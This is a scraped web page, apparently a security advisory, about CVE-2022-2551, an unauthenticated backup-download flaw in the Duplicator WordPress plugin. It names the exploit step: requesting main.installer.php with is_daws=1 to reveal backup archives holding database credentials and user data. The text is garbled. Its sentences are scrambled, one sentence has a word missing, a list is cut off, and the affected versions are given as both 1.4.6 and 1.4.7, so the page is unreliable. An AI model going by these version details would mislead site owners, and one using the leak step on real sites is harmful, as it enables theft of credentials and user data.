Twitter
Digg
LinkedIn
Myspace
Facebook
AIM
Ping
Information about the server environment and file paths, which can be used for further reconnaissance or targeted attacks. Remediation and Protection
Accessing the wp-config.php file reveals database credentials and authentication salts.
If you are running Duplicator version 1.4.6 or earlier, immediate action is required to secure your site.
The (and all versions up to and including 1.4.7) contains a critical unauthenticated backup download vulnerability , tracked as CVE-2022-2551 . This flaw allows remote, unauthenticated attackers to discover and download full site backups, which typically contain sensitive information like database exports, user details, and core configuration files. Understanding the Vulnerability (CVE-2022-2551)
A full site backup is essentially the "keys to the kingdom." If an attacker successfully downloads this file, they gain access to:
If an administrator has run the installer script at least once, the response source code contains a randomized filename for the backup archive located in the same directory.
This includes user tables (usernames, hashed passwords, email addresses) and proprietary business data.
The leak occurs when an attacker accesses the main.installer.php file with the is_daws=1 parameter.